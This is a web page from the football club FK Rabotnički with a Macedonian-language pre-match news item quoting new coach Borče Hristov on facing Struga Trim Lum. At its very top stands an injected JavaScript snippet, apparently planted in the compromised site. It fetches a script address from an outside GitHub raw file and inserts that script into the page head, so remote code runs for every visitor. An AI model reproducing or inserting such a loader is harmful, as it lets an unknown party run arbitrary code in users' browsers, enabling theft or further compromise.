;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Христов: Струга ТЛ е квалитетен тим, ќе мора да одиграме речиси совршено за да ја оствариме целта
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Христов: Струга ТЛ е квалитетен тим, ќе мора да одиграме речиси совршено за да ја оствариме целта

Работнички во 14.коло од Првата фудбалска лига денеска (13 часот) гостува кај Струга Трим Лум. Новиот тренер Борче Христов очекува добро издание на тимот и поволен епилог на крајот од мечот. Тој денеска ќе го има официјалното деби на клупата.

„Не очекува тежок и неизвесен натпревар. Работевме интензивно од моето назначување, се уште се запознаваме со фудбалерите и начинот на работа, но веќе ги имаме најзначајните контури како би требала да изгледа играта на Работнички во наредниот период. Многу борба, многу трчање и нагласена желба за позитивен резултат. Се надевам дека веќе денеска ќе одиграме на ваков начин и дека ќе успееме да оствариме позитивен резултат. Струга Трим е квалитетен тим, посебно добро игра на домашен терен и ќе мора да одиграме речиси совршено за да успееме да ја оствариме нашата цел“, вели шефот на стручниот штаб, Борче Христов.

Натпреварот меѓу Струга ТЛ и Работнички е закажан за 13 часот на стадионот во Струга.